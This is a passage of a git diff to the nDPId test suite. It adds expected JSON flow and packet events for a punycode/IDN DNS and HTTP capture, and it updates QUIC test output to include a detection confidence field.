+00444{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"punycode-idn.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32}
+00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"punycode-idn.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1643874953669,"flow_last_seen":1643874953669,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"ts_msec":1643874953669,"l3_proto":"ip4","src_ip":"192.168.2.140","dst_ip":"192.168.2.1","src_port":45520,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
+00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"punycode-idn.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1643874953669,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":69,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":69,"pkt_l4_len":35,"ts_msec":1643874953669,"pkt":"BBjWBrNamAGnpQyTCABFAAA3T1gAAEARpYDAqAKMwKgCAbHQADUAI+SVpXsBAAABAAAAAAAAAWkEc2NkbgJjbwAAAQAB"}
+00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"punycode-idn.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1643874953669,"flow_last_seen":1643874953669,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"ts_msec":1643874953669,"l3_proto":"ip4","src_ip":"192.168.2.140","dst_ip":"192.168.2.1","src_port":45520,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Spotify","breed":"Acceptable","category":"Music"},"dns": {"query":"i.scdn.co","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00547{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"punycode-idn.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1643874953689,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":128,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":128,"pkt_l4_len":94,"ts_msec":1643874953689,"pkt":"mAGnpQyTBBjWBrNaCABFAAByB3NAAEARrSrAqAIBwKgCjAA1sdAAXmq0pXuBgAABAAIAAAAAAWkEc2NkbgJjbwAAAQABwAwABQABAAAACwAfBnNjZG5jbwdzcG90aWZ5A21hcAZmYXN0bHkDbmV0AMAnAAEAAQAAAB4ABJJLPvg="}
+00778{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2,"source":"punycode-idn.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1643874953669,"flow_last_seen":1643874953689,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":113,"flow_avg_l4_payload_len":56,"midstream":0,"ts_msec":1643874953689,"l3_proto":"ip4","src_ip":"192.168.2.140","dst_ip":"192.168.2.1","src_port":45520,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Spotify","breed":"Acceptable","category":"Music"},"dns": {"query":"i.scdn.co","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"146.75.62.248"}}
+00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"punycode-idn.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1643874953695,"flow_last_seen":1643874953695,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"ts_msec":1643874953695,"l3_proto":"ip4","src_ip":"192.168.2.140","dst_ip":"192.168.2.1","src_port":60156,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
+00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"punycode-idn.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1643874953695,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":81,"pkt_l4_len":47,"ts_msec":1643874953695,"pkt":"BBjWBrNamAGnpQyTCABFAABDinIAAEARalrAqAKMwKgCAer8ADUAL4QJ+wUBAAABAAAAAAAAA3d3dw14bi0tbW5pY2gta3ZhA2NvbQAAAQAB"}
+00769{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"punycode-idn.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1643874953695,"flow_last_seen":1643874953695,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"ts_msec":1643874953695,"l3_proto":"ip4","src_ip":"192.168.2.140","dst_ip":"192.168.2.1","src_port":60156,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"www.xn--mnich-kva.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"punycode-idn.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1643874953696,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":81,"pkt_l4_len":47,"ts_msec":1643874953696,"pkt":"mAGnpQyTBBjWBrNaCABFAABDB3RAAEARrVjAqAIBwKgCjAA16vwALwOG+wWBgwABAAAAAAAAA3d3dw14bi0tbW5pY2gta3ZhA2NvbQAAAQAB"}
+00777{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":4,"source":"punycode-idn.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1643874953695,"flow_last_seen":1643874953696,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":78,"flow_avg_l4_payload_len":39,"midstream":0,"ts_msec":1643874953696,"l3_proto":"ip4","src_ip":"192.168.2.140","dst_ip":"192.168.2.1","src_port":60156,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"www.xn--mnich-kva.com","num_queries":1,"num_answers":0,"reply_code":3,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5,"source":"punycode-idn.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1643874961730,"flow_last_seen":1643874961730,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1643874961730,"l3_proto":"ip4","src_ip":"192.168.2.140","dst_ip":"170.33.9.230","src_port":56011,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
+00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"punycode-idn.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1643874961730,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1643874961730,"pkt":"BBjWBrNamAGnpQyTCABFAABAAABAAEAGw3zAqAKMqiEJ5trLAFCDcwnXAAAAALAC\/\/\/UoQAAAgQFtAEDAwYBAQgKl2brUQAAAAAEAgAA"}
+00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"punycode-idn.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1643874961751,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1643874961751,"pkt":"mAGnpQyTBBjWBrNaCABFAABAAABAADMG0HyqIQnmwKgCjABQ2svsD6nIg3MJ2LASFoCwBAAAAgQFrAEBAQEBAQEBAQEBAQEBAQEEAgAA"}
+00448{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"punycode-idn.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1643874961751,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1643874961751,"pkt":"BBjWBrNamAGnpQyTCABFAAAoAABAAEAGw5TAqAKMqiEJ5trLAFCDcwnY7A+pyVAQ\/\/86WAAA"}
+00758{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8,"source":"punycode-idn.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1643874961730,"flow_last_seen":1643874961751,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":83,"flow_tot_l4_payload_len":83,"flow_avg_l4_payload_len":20,"midstream":0,"ts_msec":1643874961751,"l3_proto":"ip4","src_ip":"192.168.2.140","dst_ip":"170.33.9.230","src_port":56011,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"www.love.xn--55qx5d","url":"www.love.xn--55qx5d\/","code":0,"content_type":"","user_agent":"curl\/7.77.0"}}
+00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":16,"source":"punycode-idn.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1643874953669,"flow_last_seen":1643874953689,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":113,"flow_avg_l4_payload_len":56,"midstream":0,"ts_msec":1643874962305,"l3_proto":"ip4","src_ip":"192.168.2.140","dst_ip":"192.168.2.1","src_port":45520,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Spotify","breed":"Acceptable","category":"Music"}}
+00576{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":16,"source":"punycode-idn.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1643874953695,"flow_last_seen":1643874953696,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":78,"flow_avg_l4_payload_len":39,"midstream":0,"ts_msec":1643874962305,"l3_proto":"ip4","src_ip":"192.168.2.140","dst_ip":"192.168.2.1","src_port":60156,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
+00672{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":16,"source":"punycode-idn.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1643874961730,"flow_last_seen":1643874962305,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":711,"flow_tot_l4_payload_len":877,"flow_avg_l4_payload_len":73,"midstream":0,"ts_msec":1643874962305,"l3_proto":"ip4","src_ip":"192.168.2.140","dst_ip":"170.33.9.230","src_port":56011,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}}
+00161{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":16,"source":"punycode-idn.pcap","alias":"nDPId-test","total-events-serialized":20}
+~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
+~~ packets captured/processed: 16/16
+~~ skipped flows.............: 0
+~~ total layer4 data length..: 1068 bytes
+~~ total detected protocols..: 3
+~~ total active/idle flows...: 3/3
+~~ total timeout flows.......: 0
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+~~ total memory allocated....: 4682033 bytes
+~~ total memory freed........: 4682033 bytes
+~~ total allocations/frees...: 101168/101168
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+~~ json string min len.......: 166 chars
+~~ json string max len.......: 783 chars
+~~ json string avg len.......: 544 chars
diff --git a/test/results/quic-23.pcap.out b/test/results/quic-23.pcap.out
index 04478d4c2..42ce1d224 100644
--- a/test/results/quic-23.pcap.out
+++ b/test/results/quic-23.pcap.out
@@ -1,10 +1,10 @@
 00439{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"quic-23.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32}
 00632{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"quic-23.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1568282515655,"flow_last_seen":1568282515655,"flow_idle_time":180000,"flow_min_l4_payload_len":1280,"flow_max_l4_payload_len":1280,"flow_tot_l4_payload_len":1280,"flow_avg_l4_payload_len":1280,"midstream":0,"ts_msec":1568282515655,"l3_proto":"ip6","src_ip":"2e4a:774d:26fd:7f9b:785b:2d1b:4f8a:63c7","dst_ip":"3bcc:9991:faba:bae1:cd2a:e2fd:b3be:c5ab","src_port":50339,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02194{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"quic-23.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1568282515655,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1342,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":1342,"pkt_l4_len":1288,"ts_msec":1568282515655,"pkt":"nJcmWLFfnLbQWTW8ht1gDdl5BQgRQC5Kd00m\/X+beFstG0+KY8c7zJmR+rq64c0q4v2zvsWrxKMBuwUI0EbI\/wAAFwhgax2p4Mt\/UAjcZWkdxzWqcwBE5rEFViXUV0In7d2dXZD4W8++zjZDJBAgmoI+svdNaYLoeL2jqHl80IO9pEfUmkgFWLrT4IlQo8t\/87yXQq3IRCWsbaCVh5W99qNLF16ofVb625RKhJQKN3iU3vpP3WaISyCxGoJXiHsP7sj27ny7LXNNKzH3JhZ3bhiQLS2umcd29X6XChqhAWZjn23A4EHWtq4oNdhkFu8LZI\/zfG+rUZSQr5lxakbHyPuebWPbqVuz09T5esBIjonthwzDSYvYZa0ySbIdmaeXdhlU+E4gLC4WHroq5LZx9pnr7yREt9Dp2HJiUOt1EMzTCveDJnfcPHqR1d6\/YEuvBxkwGcxK7MQsgXVVjQjLsVYM3zgE\/nenut5XK3K7bJeAGfZxUrn\/Y\/S6NaLxM1FgdUyaPkXMATL13fHOLn2TPbUyanoNHsWUaGSz60C+oUnJItBjv49AfcrV5AnxAjninyCVT7ilbuKRBYQ5SPLHeBsT\/NbnYJzK0I1Zj3I7weUUkkcrweRBiR069XTJtWYqzSUqWU5sALkglRvuf6xbvYulQ0jX8ozHEripA5ju8KQBmPJZP7WSUIMlyS8g26Pb2k443GZRz9hlPYNrTsHRc88FbzG8+ahhy1UIvmg27b6gKLWKeoPRPqT\/23G0Wo1ikM4FoXKXzvnDWe1X8Z9PVn+LOSHYR1LqJoMp2f2mWQv847crRAwAw1YWxPVKlFpXb0rR+0hsSK+RIdQgAqDBA2QX26xlMLPLaV5FnoRKfTJi7o9j6TamnIQyR\/b\/g\/IDH2Be62ORQ7K4p27Oyqju5N6C9b0vid0F4+gZ13RNe5vPbvcGGwDUSCHzH5HuKrGh25US\/X91xJ8gist97L0Lrq0S80URKpcxHqC0QxbI4sgi04MOC\/6\/5f2icaiX5IcU\/hdojFqggO95m2grFOU8yda1Z+a+0B+UTPAWzUgGxyOkCthMdR1xVGZfRvlXwGjfBMd6dc\/vwfyp1b8YonfSnSW3vRZZoOvGgqRgE1cEyUD4uXR+I9J+U7b3lAENyqEE6S4PVFwPk4xcaNCNEAFsAmLQRfMnqgm4EclQ2fu\/X4rXYn\/w4VPhxSJ7gZUA4NgNeVynLRKqHUa727Gwo4yXA2fLLCZot4qNfI9GV8gEGhiMrmnJDuuHONvYi8VFwSgiQP9jsRAqGAnvDEEaUirzATf+CkE90c9u9BJN208aRmeL0Hgd\/ZHM6TlLySnssgUghAaObIZXCdBIsYxzkTGX3jv35junPGfSl4SRLk2gvnSptlPR\/Rn6scXnHyxcxY1Tth69QcUpqe9cAH3STuQaFNZjD1dVf2R7djGBGP8XFpAEp4Da6SL0QShqq2TI46wOMWpyGEWgp5CuFAlZyh9lsxPPSVCNRF6ZIHFDEA176ay7PnXocWlpL62qyFOm8ITDpOqmFNLCDdEm1Gb4uY5DgmlqhAIdCuIUzNcLPBAucHSIQlvc6jwsUov+EyqsbCmhoguNjYqYWkTXfROVcd+bJTmI+cPOgPBBwa2oOWk+BLrQ6aBz1dQvhb5YuoZMwA09AEkY+2M7NcQxKjjOU+yU4Hx1Fn0nTrg3sFfxY6wAlusfFhQgzHz4cuAwlvBXae00jqiXWXUvQQ1Rtfra3X+TNbZCCp1e2k+Vki2RypB\/ckwHS7gD9wnM+\/\/rgzF\/7w=="}
-00831{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"quic-23.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1568282515655,"flow_last_seen":1568282515655,"flow_idle_time":180000,"flow_min_l4_payload_len":1280,"flow_max_l4_payload_len":1280,"flow_tot_l4_payload_len":1280,"flow_avg_l4_payload_len":1280,"midstream":0,"ts_msec":1568282515655,"l3_proto":"ip6","src_ip":"2e4a:774d:26fd:7f9b:785b:2d1b:4f8a:63c7","dst_ip":"3bcc:9991:faba:bae1:cd2a:e2fd:b3be:c5ab","src_port":50339,"dst_port":443,"l4_proto":"udp","ndpi": {"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"quic.aiortc.org","version":"TLSv1.3","alpn":"h3-22","ja3":"d9e7bdb15af8e499820ca74a68affd78","tls_supported_versions":"TLSv1.3"}}
+00857{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"quic-23.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1568282515655,"flow_last_seen":1568282515655,"flow_idle_time":180000,"flow_min_l4_payload_len":1280,"flow_max_l4_payload_len":1280,"flow_tot_l4_payload_len":1280,"flow_avg_l4_payload_len":1280,"midstream":0,"ts_msec":1568282515655,"l3_proto":"ip6","src_ip":"2e4a:774d:26fd:7f9b:785b:2d1b:4f8a:63c7","dst_ip":"3bcc:9991:faba:bae1:cd2a:e2fd:b3be:c5ab","src_port":50339,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"quic.aiortc.org","version":"TLSv1.3","alpn":"h3-22","ja3":"d9e7bdb15af8e499820ca74a68affd78","tls_supported_versions":"TLSv1.3"}}
 02190{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"quic-23.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1568282515692,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1342,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":1342,"pkt_l4_len":1288,"ts_msec":1568282515692,"pkt":"nLbQWTW8nJcmWLFfht1jg4MNBQgRKzvMmZH6urrhzSri\/bO+xasuSndNJv1\/m3hbLRtPimPHAbvEowUIuNfA\/wAAFwjcZWkdxzWqcwhFc8YEuuNHtABAtpp6lo422zhpwEmkM9jMJwXgbUjN1owR7TPZ1JXY0x3to1D6g0dAafVV30k+fGVC\/0C4Lnu2sLDcx8bF+ojnk3GSUQTIdHu8ZX\/oVbrFn8IuIOJ3OaMKQNh30NDOQmduQ87svdAwpsnJ5RCWJgsXaKkJYeNxtTrcf\/UMkEEGwqmH7iXERiPPP6YaygHazOGgvsi3IgRqxtSyogodVJFIEF7\/I\/hK4c4fV\/Fp6TOnZq7yPU8RHUGd6f8AABcI3GVpHcc1qnMIRXPGBLrjR7REF+M5klzW6SVGEmXEZf3SgmWO3YJGZMJzHMMmsHpZMJuleNbNpwTfLHRv+w8U8jTxrick9JoK2C0BLjMMU4lyZBfsOtqy8CVjK71G6biWjirvwKveDUbbdnabD6oNKRkjU10KrpsRv07\/rr3\/DxiYNICA4+aqMz+EOwXWo58jzMZwzCPamN69kB0IxZj8SzHACrAvpI3mhJaTesCVi09n+Vjx8LN1j9+ciB82njpNGQqupy7Qg1DSJdzbPwEAh71uJyF2iB3iJGpO+cy2cML4KVvm81IPGXCiOmV58o3v5\/zmODjNmo2sfVOW9wf6PkvwpMzRrLhfpb7g\/8GFhwl4Yw4+ghn0eekbQWZnpZKkF4+ktWY8mTGVecRfIhXVpZaHrV6+jU8BF4DL68+dkgY\/AI15OZZ52IXevPDJv5nQvF4MBVYN4PDEtox+qpac1LTHNAeqQxSa69g15gLUO1TxuS1ywL2AY+BTIWioy9hE61HxGs\/ZqgzZK9mcRJcA1dvWBNaIUiSpdORjz8n0pKG8K\/4ou3pHJN8tLdmk66Qlvhq4T7hwQDIwVgb9q3keP6FrYLSeg\/J0qh+c2s9xPzmAsIVg9ZVDDHWX3Bcun6KxexZ4flHGnhxx5gihdcmy838IeEFcy7du2wwafPbat0Jj+jGrpEh+yIEM+DtfZqs9yQEdy\/MqTQFZpt+aZuMVHvsRxgp9ckGC0lTv66FWbXDl0UazKFBVhBALr2J0iQx9RaI2aenslg1ZNK4Bc+Cb91EVBWrZM10MM25SZ+fC29ATKbXKDxWyuH+nM3ACeSqc9x6e7lODjH2H79xEPA8nXIZozszF8WDBA9K6wgnma97DIVxV4gV9QTaSzRRZf7GOTqGIfycjVC4dW+EtiHjVND4FWrZia3IFSniSe\/c6Z8zy01Y4U7isxhUZE84FRn4gZ+V\/LlAqURAOifpcMdrbloG+azDOECnPpupOebIuXwWz7aOW1fuY\/H1I+R4NtFDR8J3Xw+payk7QhXdsFx5GWInJP3dTMaCf7cVsQwH9u0KYAcwhL8Cwh+DnwFPiuH4IialTTqxwU\/T+06FOuOrMPq+bKnPZ5FwJAgHNilWYjP7NfZyL47Oq9aVGecGeTMEVn1UOO1QiFCmqyGvATws+6y3jOAqvQGQaZwrrHaE+V+KOl6f9J9WMLa6SkuWVKt++KVL5CFRWylgx+1d9Uek8ct9jA8ZlmfNzZ9cA+5HqJ1DeuTlGJqOlBCtnXfinCTal7z1JN5uB10EcGFFvKfAbK7xwlVGsEn6XXUBj0DLCMr40cur5GW3A0wuiby+nlkq7AslBw7l3uUqOibKhCVQJrTyCrMLKjl7uaVf6toOqyI\/5H1Aamf9JQmaiBUuE66iZeoeNEFEyhhGDVA=="}
 01757{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"quic-23.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1568282515692,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1017,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":1017,"pkt_l4_len":963,"ts_msec":1568282515692,"pkt":"nLbQWTW8nJcmWLFfht1jg4MNA8MRKzvMmZH6urrhzSri\/bO+xasuSndNJv1\/m3hbLRtPimPHAbvEowPDFkLs\/wAAFwjcZWkdxzWqcwhFc8YEuuNHtEMUyYrBFar3hn3903Wyiwal5ts19EiC\/\/0o403TuQXHzpo07QLjQNsCS6rfVQ9h\/bhZfcPHM1NTnnZdcI\/w+qZX0yTnNRovgdVWw6cVvyMMf\/AR4wKYphPcoUgcwsn7KReOxOm3nR3LYOawLtgN5YWMmql7MzZUW1CzcSjBB+M6TJiRoKw93nPerpbhVcyLUx25I3\/NADqEJnBz21jEouIL682I+IDJYwKoa48yaEr6CLTsyyGj\/lts\/4JjTKWASRBqsw7OY\/PZ+1W1OwDSwb\/PFJvlZQUl\/G5xBYfmg9n3A5KSgPg+AWI0iah3p4kBgWKDCRmgMv5aLdZqf97KuUEYmV3E77OatXFisUIwNgupj2ZBePSzcVFv6BviacQ0eIFnW\/WBQ8G99nQvGQgIVYRbS86l3ozgh4LzmRsw5Qx1M20rfV7sH8J5eDfvoJvM8Kt39vBoA2a\/YDhQooz13TukgVejyLKskuIKc854y2yoygBAiap3h\/2UZI1Hy+ylvot5B+\/VTalIWeEUdzPMUhYFiTMO6\/2d1DRzWkipTCjRPVLHWEScPJdEJ+VMNpVWsin+bWqHvT4BQnmP9jratt0VWOV2ObUqvupTouCJiGV9bM1dHvlMD7MRwtSrbsmRdsKZ3s9ntmpvH57yloY2vd7s1jXD5Tju8J3B+9DUXz6xNltvws\/LFUo2CSsbLQjNtWY3s5dPyf5CxKUWscmwismYbV97k961UCmVvPNlUhdtJ0fKJNxq75eNdsxnG3\/awZI3OuFYwxViRQiZCNMdgzOZGSKYfAy7Lp\/MhmSQ7bAc+NzZptzeI2dGY6EavQ3CQJraclZiH\/R2wGoMhKXvX1vwKDaGVZ6fDICtnupheoKdKLVVe1JbFxgSvP1CvU\/Fz5zvnUrUFgqsCm6EqZc9b0Nx46hJuQ+nXvuD7J3wzTSb4pIdJo3654drX\/so2eyJPJ93U+qbVr7vq7ywwBxcwDyk3BB58zXgOMZkN4mMUtFH32aXAokBlkhQ6f8WPzuTxuiyG3qJM8aRb4I2zN7cmOkjaJPcEMZK3GVpHcc1qnNubgcg9n\/B+tCxShTYqf9BsxGc4HfmCIwhwjiuwdU27nolghC\/g0vijyYzvRU15Q2hMyPcrtTOsXP1UDcSAxAEOHoM9K86QNjMEWUkGPI0wcCBc5w6OEh9AHnk5JwjWpUceKbwoH7jh6GuoflfGRMbCEmAFjB4Wu0Zq5vel1+DIem2Tl+i"}
-00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":20,"source":"quic-23.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1568282515655,"flow_last_seen":1568282515762,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":1280,"flow_tot_l4_payload_len":5951,"flow_avg_l4_payload_len":297,"midstream":0,"ts_msec":1568282515762,"l3_proto":"ip6","src_ip":"2e4a:774d:26fd:7f9b:785b:2d1b:4f8a:63c7","dst_ip":"3bcc:9991:faba:bae1:cd2a:e2fd:b3be:c5ab","src_port":50339,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"QUIC","breed":"Acceptable","category":"Web"}}
+00725{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":20,"source":"quic-23.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1568282515655,"flow_last_seen":1568282515762,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":1280,"flow_tot_l4_payload_len":5951,"flow_avg_l4_payload_len":297,"midstream":0,"ts_msec":1568282515762,"l3_proto":"ip6","src_ip":"2e4a:774d:26fd:7f9b:785b:2d1b:4f8a:63c7","dst_ip":"3bcc:9991:faba:bae1:cd2a:e2fd:b3be:c5ab","src_port":50339,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}}
 00155{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":20,"source":"quic-23.pcap","alias":"nDPId-test","total-events-serialized":8}
 ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
 ~~ packets captured/processed: 20/20
@@ -14,9 +14,9 @@
